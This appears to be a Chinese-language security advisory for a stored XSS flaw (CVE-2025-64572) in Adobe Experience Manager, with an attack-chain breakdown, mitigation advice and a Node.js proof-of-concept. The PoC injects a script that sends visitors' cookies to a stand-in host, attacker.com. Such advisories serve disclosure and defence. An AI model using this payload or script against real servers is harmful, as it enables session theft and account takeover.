Adobe Experience Manager 存储型XSS漏洞 (CVE-2025-64572)

漏洞信息

漏洞编号

CVE-2025-64572

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64572是Adobe Experience Manager中的一个存储型跨站脚本(XSS)漏洞。该漏洞影响6.5.23及之前版本，CVSS评分为5.4（中危）。低权限攻击者可以利用此漏洞将恶意JavaScript脚本注入到存在漏洞的表单字段中。当受害者在浏览器中访问包含该恶意字段的页面时，注入的恶意脚本将被执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等危害。由于是存储型XSS，恶意脚本会被永久保存在服务器端，影响所有访问该页面的用户。Adobe官方已确认此漏洞并建议用户升级到最新版本以修复该问题。

技术细节

该漏洞为存储型（Stored）跨站脚本漏洞，存在于Adobe Experience Manager的表单处理组件中。攻击者首先需要拥有一个低权限账户（如内容作者或普通用户），然后在表单输入字段中注入恶意JavaScript代码。由于应用程序未对用户输入进行充分的输出编码或验证，恶意脚本被存储在服务器数据库中。当其他用户（尤其是管理员）访问包含该字段的页面时，浏览器会解析并执行注入的脚本。攻击者可利用此漏洞窃取受害者Cookie、劫持会话、执行任意操作或进行钓鱼攻击。由于漏洞位于内容创作流程中，即使是非管理员用户也能成功利用，影响范围较广。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标Adobe Experience Manager版本，确认版本号<=6.5.23以确认存在漏洞

STEP 2

Initial Access

攻击者获取Adobe Experience Manager的低权限账户（如普通用户或内容作者账号）

STEP 3

Payload Injection

通过表单提交或内容编辑功能，将恶意JavaScript代码（如<script>标签）注入到存在漏洞的表单字段中

STEP 4

Persistence

恶意脚本被存储在服务器数据库中，成为页面内容的一部分，实现持久化

STEP 5

Execution

当受害者（管理员或其他用户）访问包含该恶意字段的页面时，浏览器执行注入的JavaScript代码

STEP 6

Impact

攻击者成功窃取用户Cookie、会话令牌或执行其他恶意操作，可能导致账户接管或敏感数据泄露

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-64572 Stored XSS PoC
// Target: Adobe Experience Manager <= 6.5.23
// Author: Security Researcher

const axios = require('axios');

const TARGET_URL = 'https://vulnerable-aem-server.com';
const USERNAME = 'low_privilege_user';
const PASSWORD = 'user_password';

async function exploit() {
    // Step 1: Login to get session cookie
    const loginResponse = await axios.post(`${TARGET_URL}/libs/granite/core/content/login.html`, {
        j_username: USERNAME,
        j_password: PASSWORD,
        _charset_: 'utf-8'
    }, {
        headers: { 'Content-Type': 'application/x-www-form-urlencoded' }
    });

    const cookies = loginResponse.headers['set-cookie'];
    console.log('[+] Login successful');

    // Step 2: Inject malicious XSS payload into form field
    const xssPayload = '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>';
    
    const exploitData = {
        './jcr:content': {
            'sling:resourceType': 'foundation/components/form/text',
            'text': xssPayload,
            'name': 'vulnerable_field',
            'jcr:primaryType': 'nt:unstructured'
        }
    };

    // Step 3: Create or update form component with XSS payload
    await axios.post(`${TARGET_URL}/content/forms/af/vulnerable-form/jcr:content`, 
        exploitData,
        { headers: { 'Cookie': cookies, 'Content-Type': 'application/json' } }
    );

    console.log('[+] XSS payload injected successfully');
    console.log('[+] Payload will execute when victims visit the affected page');
}

exploit().catch(console.error);

// Usage: node cve-2025-64572-poc.js

影响范围

Adobe Experience Manager <= 6.5.23

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时措施：1) 限制低权限用户创建或编辑表单内容的功能；2) 在Web应用防火墙(WAF)层面配置XSS防护规则，过滤<script>等危险标签；3) 禁用或限制富文本编辑器的HTML渲染功能；4) 对现有内容进行安全扫描，查找已注入的恶意脚本；5) 监控用户提交内容中的可疑模式。但最有效的修复方式仍是尽快升级到官方发布的最新版本。